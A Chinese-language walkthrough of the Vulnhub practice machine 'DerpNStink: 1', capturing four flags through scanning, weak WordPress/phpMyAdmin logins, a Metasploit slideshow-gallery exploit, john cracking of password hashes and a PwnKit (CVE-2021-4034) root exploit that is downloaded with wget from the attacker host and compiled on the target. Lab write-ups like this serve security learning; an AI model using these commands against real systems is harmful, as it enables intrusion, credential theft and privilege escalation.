Vulnhub靶机:DerpNStink: 1

news2024/12/26 3:53:07

0x01 项目地址

DerpNStink: 1

0x02 靶机描述

Your goal is to remotely attack the VM and find all 4 flags eventually leading you to full root access. Don't forget to #tryharder

您的目标是远程攻击虚拟机并找到所有 4 个 flag ,最终让您获得完全 root 访问权限。别忘了 #更加努力

0x03 环境搭建

靶机

DerpNStink: 1

NAT模式 192.168.6.168

攻击机

kali

NAT模式 192.168.6.128

0x04 详细步骤

1.主机发现

nmap -sP 192.168.6.0/24

2.端口扫描

nmap -p- -A -sV -Pn 192.168.6.168

开放了21/22/80三个端口

3.目录扫描

dirsearch -u 192.168.6.168

4.flag1

浏览器访问192.168.6.168

随便翻了翻,Curl+U查看源码,发现第一个flag

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

5.flag2

同时在源码中发现了一个信息

点击查看内容,大概意思是说需要更新本地hosts文件才能访问博客

拼接访问刚才目录扫描扫到的目录/robots.txt,这里边两个目录依次访问没有发现有用的信息

拼接访问/php/phpmyadmin/,这是一个phpmyadmin登录界面,尝试弱口令爆破,没有爆破成功

到此在80端口没有可利用的内容了,不过既然提示了要配置本地hosts文件才能访问博客,那应该还有一个博客没有访问到,但是之前目录扫描并未扫描到,这里换种方式再次目录扫描一下

dirb http://192.168.6.168

这次扫到了

然后我们来访问一下

http://192.168.6.168/weblog/

这里发现自动跳转到了另一个地址http://derpnstink.local/weblog/

根据这个地址我们来配置一下本地hosts文件,在hosts文件中新增一条数据

192.168.6.168 derpnstink.local

再次访问http://192.168.6.168/weblog/,翻了翻也没有什么可利用的点

拼接访问/weblog/wp-admin/,又一个登录界面,尝试弱口令

admin
admin

登录成功了

因为是WordPress站点,所以我们可以使用wpscan扫描看看

wpscan --url http://derpnstink.local/weblog/

扫描到WordPress版本是4.6.29

还有一个插件slideshow-gallery

打开MSF搜索Slidehow Gallery查看是否有可利用的模块

msfconsole
search Slidehow Gallery

确认有,开始利用

use 0
show options						 #显示配置参数
set rhosts 192.168.6.168 #靶机IP
set targeturi /weblog/	 #靶机路径
set wp_user admin				 #设置账号
set wp_password admin		 #设置密码
run											 #运行

执行成功,输入shell,成功getshell

shell

利用python将shell转变为交互式的shell

python -c 'import pty; pty.spawn("/bin/bash")'

然后寻找可利用的文件,在/var/www/html/weblog下的wp-config.php发现了数据库账号密码:root/mysql

cd /var/www/html/weblog
cat wp-config.php

然后在phpmyadmin那个登录页面进行登录

http://192.168.6.168/php/phpmyadmin/

wordpress数据库 -> wp_posts表中发现 flag2.txt

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

6.flag3

继续查找线索,在 wordpress数据库 -> wp_users表中发现两个账户及密码

unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/

密码是被编码过的,接下来我们来爆破一下这两个密码

先在桌面新建一个txt文件存放账号密码

cd Desktop
vim user_pass.txt

然后在/usr/share/wordlists解压字典并将其复制到桌面

cd /usr/share/wordlists
gunzip rockyou.txt.gz
cp rockyou.txt /home/kali/Desktop
cd /home/kali/Desktop

然后用john爆破密码

john --wordlist=rockyou.txt user_pass.txt 

爆破成功

unclestinky:wedgie57
admin:admin

在靶机home目录下发现两个用户,mrderp/stinky

cd /home
ls

尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57,成功登录,并在/stinky/Desktop目录下找到flag.txt

su stinky
password:wedgie57
ls
cd stinky
ls
cd Desktop
ls
cat flag.txt

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

7.flag4

权限提升

github中找到了对应版本的提权脚本,我们将其下载并放到kali桌面

GitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)

开启kalihttp服务,将脚本复制到网站根目录下

service apache2 restart
cp cve-2021-4034-poc.c  /var/www/html

利用kalihttp服务,将脚本下载到靶机,给到其执行权限,将其编译

wget http://192.168.6.128/cve-2021-4034-poc.c
chmod +x cve-2021-4034-poc.c
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt

完成后执行脚本,就拿到了root权限

./cve-2021-4034-poc

最后在/root/Desktop目录下找到了最后一个flag

cd /root/Desktop
ls
cat flag.txt

flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

至此四个flag以及root权限全部完成!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2172679.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Updates were rejected because the tip of your current branch is behind 的解决方法

1. 问题描述 当我们使用 git push 推送代码出现以下问题时: 2. 原因分析 这个错误提示表明当前本地分支落后于远程分支,因此需要先拉取远程的更改。 3. 解决方法 1、拉取远程更改 在终端中执行以下命令,拉取远程分支的更新并合并到本地…

SpringBoot学习笔记(1)

1.Web技术基础 BS:(Browser/Server,浏览器/服务器架构模式)。C/S架构主要特点是交互性强,具有安全访问模式,网络流量低,响应速度快,因为客户端负责大多数业务逻辑和UI演示,所以也被称为胖客户端,C/S结构的软…

【含文档】基于Springboot+微信小程序 的中心医院用户移动端(含源码+数据库+lw)

1.开发环境 开发系统:Windows10/11 架构模式:MVC/前后端分离 JDK版本: Java JDK1.8 开发工具:IDEA 数据库版本: mysql5.7或8.0 数据库可视化工具: navicat 服务器: SpringBoot自带 apache tomcat 主要技术: Java,Springboot,mybatis,mysql,vue 2.视频演示地址 3.功能 系统定…

学习之什么是生成器

什么是生成器(Generator) 1、是一种数据类型能源源不断地生成数据 2、"惰性"特点:一次生成一个值,而不是生成一个序列 3、生成器一定是迭代器比迭代器更简洁使用生成器表达式创建生成器 from typing import Generator, Iterator,…

【hot100-java】【柱状图中最大的矩形】

R9-栈篇 面积最大矩形的高度一定是 heights 中的元素 简单解释,就是说,最大高度必然是heights中的一个元素,我们假设是h,然后我们基于h,左右拓展,尽量拓展到h越来越高(符合单调栈)&a…

7.6透视变换

基本概念 在计算机视觉和图像处理领域中,透视变换(Perspective Transformation)是一种重要的几何变换,用于模拟从一个视角到另一个视角的变换,比如从鸟瞰视角到正面视角的变换。透视变换通常用于图像配准、增强现实、…

ubuntu报错you don‘t have enough free space in /var/cache/apt/archivers.

使用df -h命令查看; 扩充前,dev/sda2的大小: 使用gparted工具对dev/sda2进行扩容

Steam黑神话悟空禁止更新进入游戏的解决方案

首先打开该网站:https://steamdb.info/app/2358720/ 2358720即为游戏ID 网页下翻,找到更新历史:https://steamdb.info/app/2358720/history/ 然后在Steam的steamapps下,找到后缀为2358720的文件,右击记事本打开 将St…

老照片修复工具有哪些?怎么让老照片焕发新光彩?

在那些泛黄的相框中,珍藏着我们最珍贵的记忆。 岁月流转,照片上的影像逐渐模糊,但那份情感却愈发深刻。 如何让这些老照片恢复往日的光彩,让那些珍贵的瞬间再次清晰呈现? 本文将带你探索老照片修复高清的技巧&#…

SpringMVC源码-SpringMVC框架中Spring父容器和SpringMVC子容器加载的流程以及SpringMVC九大内置组件的初始

一、Spring父容器启动 SpringMVC 的项目结构如下: applicationContext.xml spring的配置文件 <?xml version"1.0" encoding"UTF-8"?> <beans xmlns"http://www.springframework.org/schema/beans"xmlns:xsi"http://www.w3.o…

Spring Boot 进阶-如何自定义SpringBoot日志配置?

在之前的文章中我们介绍了Spring Boot中的日志框架,并且也介绍了SpringBoot日志框架中日志级别的调整。这篇文章我们主要来介绍关于如何让日志框架更加符合我们自己的需求。那么首先我们就来看一下日志文件输出路径的配置。 如何指定日志文件的输出位置 在Spring Boot中日志是…

Keepalived+MySQL 高可用集群

基础架构如下 准备干净的实验环境 [rootmysql1 ~]# systemctl stop firewalld [rootmysql1 ~]# cat /etc/sysconfig/selinux |grep "SELINUXdisabled" SELINUXdisabled [rootmysql1 ~]# setenforce 0 setenforce: SELinux is disabled [rootmysql1 ~…

动静态库(Linux)

文章目录 前言一、静态库二、动态库三、深入理解动态库总结 前言 我们之前用过c语言的库.Linux中默认的都是使用动态库&#xff0c;如果想要使用静态库&#xff0c;就必须加上-static选项。默认都是安装的动态库&#xff0c;系统中一般没有静态库&#xff0c;如果要使用&#…

算法复杂度之时间复杂度

一 . 数据结构前言 1.1 数据结构 数据结构(Data structure) 是计算机存储&#xff0c;组织数据的方式&#xff0c;指互相之间存在一种或多种特定关系的数据元素的集合。没有一种单一的数据结构对所有用途都有用&#xff0c;所以要学习各式各样的数据结构&#xff0c;如&#…

使用kaggle命令下载数据集

目录 报错 解决方案 报错 使用kaggle命令下载数据集报错了&#xff0c; 解决方案 &#xff08;1&#xff09;首先&#xff0c;确保已经安装 Python 和包管理器 pip。 运行以下命令以使用命令行访问 Kaggle API&#xff1a; pip install kaggle 可能需要在 Mac/Linux 上执行…

【BurpSuite】SQL注入 | SQL injection(1-2)

&#x1f3d8;️个人主页&#xff1a; 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞&#x1f44d;收藏&#x1f497;支持一下哦 【BurpSuite】SQL注入 | SQL injection&#xff08;1-2&#xff09; 实验一 Lab: SQL injection vulnerability in WHERE clause…

Maven项目常见各类 QA

一、pom.xml文件 1.1 there is no POM in this directory [ERROR] The goal you specified requires a project to execute but there is no POM in this directory (/home/cys/SEtesting/example/smartut-report). Please verify you invoked Maven from the correct directo…

如何实现工业设备联网?天拓四方

一、引言 随着信息技术的快速发展&#xff0c;工业设备联网已成为推动工业4.0和智能制造的核心技术之一。工业设备联网通过将传统的工业设备与互联网、云计算、大数据等技术相结合&#xff0c;实现了设备之间的互联互通&#xff0c;数据共享与智能分析&#xff0c;极大地提高了…

【计算机网络 - 基础问题】每日 3 题(二十七)

✍个人博客&#xff1a;Pandaconda-CSDN博客 &#x1f4e3;专栏地址&#xff1a;http://t.csdnimg.cn/fYaBd &#x1f4da;专栏简介&#xff1a;在这个专栏中&#xff0c;我将会分享 C 面试中常见的面试题给大家~ ❤️如果有收获的话&#xff0c;欢迎点赞&#x1f44d;收藏&…

机器学习-KNN

KNN&#xff1a;K最邻近算法&#xff08;K-Nearest Neighbor,KNN&#xff09; 用特征空间中距离待分类对象的最近的K个样例点的类别来预测。 投票法&#xff1a;K 个样例的对数类别。 k1:最近邻分类 k 通常是奇数&#xff08;因为我们根据这个K数据判断类别&#xff0c;如果…